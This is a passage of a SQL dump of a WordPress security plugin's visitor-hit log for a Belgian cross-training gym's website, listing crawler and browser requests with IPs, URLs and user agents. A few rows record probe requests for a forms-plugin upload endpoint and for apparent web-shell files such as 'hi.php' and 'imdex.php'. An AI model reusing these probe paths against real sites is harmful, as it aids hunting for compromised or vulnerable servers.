(71186, 1493718969.741429, 1753445547, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(71187, 1493718972.965780, 1753445547, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(71188, 1493718978.357210, 1753445547, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(71189, 1493718989.692809, 1753445547, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', 'http://www.crosstrainingcenter.be/?page_id=266', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(71190, 1493718993.880166, 1753445547, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(71191, 1493718997.870315, 1753445547, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(71192, 1493719002.788967, 1753445547, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(71193, 1493722927.632461, 1755877124, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-json/wp/v2/posts/', '', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31'),
(71194, 1493723658.437563, 1375112542, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(71195, 1493723658.921525, 1375112542, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71196, 1493723659.370278, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71197, 1493723659.801323, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71198, 1493723660.221442, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71199, 1493723660.673018, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71200, 1493723661.185789, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71201, 1493723661.621694, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71202, 1493723662.038653, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71203, 1493723662.463879, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71204, 1493723662.899416, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71205, 1493725598.268650, 3652617232, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/author/admin/feed/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(71206, 1493728398.764166, 2989639598, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Linux; Android 6.0.1; SAMSUNG SM-G935F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/4.0 Chrome/44.0.2403.133 Mobile Safari/537.36'),
(71207, 1493728400.208872, 2989639598, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Linux; Android 6.0.1; SAMSUNG SM-G935F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/4.0 Chrome/44.0.2403.133 Mobile Safari/537.36'),
(71208, 1493728413.080463, 2989639598, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Linux; Android 6.0.1; SAMSUNG SM-G935F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/4.0 Chrome/44.0.2403.133 Mobile Safari/537.36'),
(71209, 1493736992.103244, 1539837611, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://crosstrainingcenter.be/index.php', 'Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0'),
(71210, 1493736992.718687, 1539837611, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/?gf_page=upload', '', 'Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0'),
(71211, 1493736993.257769, 1539837611, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/?gf_page=upload', '', 'Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0'),
(71212, 1493738203.747751, 2644818889, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'https://www.google.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0'),
(71213, 1493738204.608400, 2644818889, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0'),
(71214, 1493739107.186013, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.1.30 (KHTML, like Gecko)'),
(71215, 1493739107.623459, 1374841142, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71216, 1493739108.095542, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71217, 1493739108.514391, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71218, 1493739108.994675, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71219, 1493739109.407677, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71220, 1493739110.048560, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71221, 1493739110.773158, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(71222, 1493739111.175205, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71223, 1493739111.591710, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71224, 1493739111.999769, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71225, 1493739112.457106, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71226, 1493739112.862382, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71227, 1493739113.292239, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71228, 1493742441.239723, 2509962544, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393'),
(71229, 1493747525.226658, 2509962544, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393'),
(71230, 1493752299.572333, 3112277173, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/Iontrol.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(71231, 1493757666.585742, 676177835, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(71232, 1493758288.920378, 1123632475, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71233, 1493759239.037824, 1152705560, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)'),
(71234, 1493759243.897988, 1152705560, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-limelette/', '', 'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)'),
(71235, 1493763146.751497, 1123632454, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71236, 1493763611.043289, 3112277173, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/wp-includes/css/hi.php?0=1', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(71237, 1493766487.410432, 1123632437, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71238, 1493771677.625945, 1123633542, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71239, 1493774547.547009, 1123633542, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71240, 1493774548.031680, 1123633542, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71241, 1493777897.057364, 1123633430, 0, 0, 1, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71242, 1493777898.104610, 1123633542, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71243, 1493784451.353856, 3112277173, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/imdex.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(71244, 1493790264.039972, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.1.30 (KHTML, like Gecko)'),
(71245, 1493791588.488634, 3252386809, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.google.be/url?sa=t&rct=j&q=&esrc=s&source=web&cd=10&cad=rja&uact=8&ved=0ahUKEwjavNyah9PTAhUMLVAKHWiPALUQFghgMAk&url=http%3A%2F%2Fwww.crosstrainingcenter.be%2Fles-seances-namur%2F&usg=AFQjCNF3CZXOTpgEhukKBcCq_alqy9J0kw', 'Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(71246, 1493791591.307880, 3252386809, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko'),
(71247, 1493791714.279846, 3252386809, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(71248, 1493791715.537883, 3252386809, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko'),
(71249, 1493793601.057002, 1123633542, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71250, 1493801201.170973, 3112277173, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/webconfig.txt.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(71251, 1493802602.539856, 2193201697, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.3) Gecko/2008092416 Firefox/3.0.3'),
(71252, 1493802603.073911, 2193201697, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.3) Gecko/2008092416 Firefox/3.0.3'),
(71253, 1493809212.733789, 2366158852, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(71254, 1493809216.114696, 2366145591, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(71255, 1493811641.522507, 757109195, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Cliqzbot/1.0; +http://cliqz.com/company/cliqzbot)'),
(71256, 1493811645.894704, 757109195, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (compatible; Cliqzbot/1.0; +http://cliqz.com/company/cliqzbot)'),
(71257, 1493813260.065844, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.1.30 (KHTML, like Gecko)'),
(71258, 1493813261.229571, 1374841142, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71259, 1493813261.821652, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71260, 1493813262.322156, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71261, 1493813263.023235, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71262, 1493813263.450203, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71263, 1493813263.852409, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71264, 1493813264.290293, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(71265, 1493813264.808347, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71266, 1493813265.212056, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71267, 1493813265.619340, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71268, 1493813266.104813, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71269, 1493813266.521048, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71270, 1493813266.979643, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71271, 1493815304.261279, 3024883593, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2'),
(71272, 1493815304.659773, 3024883466, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2'),
(71273, 1493815351.393171, 1324940073, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.fr/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(71274, 1493815356.394293, 1324940073, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(71275, 1493815502.808401, 3024883475, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/feed/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(71276, 1493815515.968478, 2297635928, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(71277, 1493815516.697310, 2297635928, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(71278, 1493815520.853656, 2297635928, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(71279, 1493815527.815100, 2297635928, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(71280, 1493815535.077295, 2297635928, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(71281, 1493815541.479469, 2297635928, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(71282, 1493815547.571827, 2297635928, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(71283, 1493815554.544259, 2297635928, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(71284, 1493815562.314256, 2297635928, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/feed/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(71285, 1493815567.474604, 2297635928, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/feed/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(71286, 1493815572.094455, 2297635928, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-n%3C%21DOCTYPE%20html%20PUBLIC', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(71287, 1493815579.718051, 2297635928, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/feed/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(71288, 1493815814.057772, 3475901715, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(71289, 1493816496.547492, 2644818889, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be', 'Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0'),
(71290, 1493816497.407565, 2644818889, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0'),
(71291, 1493816525.673769, 2644818889, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/266-2/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0'),
(71292, 1493816526.737050, 2644818889, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-limelette/', 'http://www.crosstrainingcenter.be/266-2/', 'Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0'),
(71293, 1493816547.318829, 2644818889, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/266-2/', 'Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0'),
(71294, 1493816548.313026, 2644818889, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0'),
(71295, 1493816569.596018, 1837372382, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 5.1; rv:51.0) Gecko/20100101 Firefox/51.0'),
(71296, 1493816573.641010, 1837372382, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 5.1; rv:51.0) Gecko/20100101 Firefox/51.0'),
(71297, 1493816653.326228, 1837372382, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 5.1; rv:51.0) Gecko/20100101 Firefox/51.0'),
(71298, 1493816655.243866, 1837372382, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/prix/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Windows NT 5.1; rv:51.0) Gecko/20100101 Firefox/51.0'),
(71299, 1493816673.278185, 2644818889, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0'),
(71300, 1493816674.734396, 2644818889, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', 'http://www.crosstrainingcenter.be/notre-philosophie/', 'Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0'),
(71301, 1493816702.804275, 2644818889, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/notre-philosophie/', 'Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0'),
(71302, 1493816704.100079, 2644818889, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0'),
(71303, 1493816704.341505, 2644818889, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0');
INSERT INTO `wp_wfHits` (`id`, `ctime`, `IP`, `jsRun`, `is404`, `isGoogle`, `userID`, `newVisit`, `URL`, `referer`, `UA`) VALUES
(71304, 1493816803.215496, 1837372382, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Windows NT 5.1; rv:51.0) Gecko/20100101 Firefox/51.0'),
(71305, 1493816804.814125, 1837372382, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', 'http://www.crosstrainingcenter.be/notre-philosophie/', 'Mozilla/5.0 (Windows NT 5.1; rv:51.0) Gecko/20100101 Firefox/51.0'),
(71306, 1493816861.899227, 2644818889, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.crosstrainingcenter.be/en-images/', 'Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0'),
